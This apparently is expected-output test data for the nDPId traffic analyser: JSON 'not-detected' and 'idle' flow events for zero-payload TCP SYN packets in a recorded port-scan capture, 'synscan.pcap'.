+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
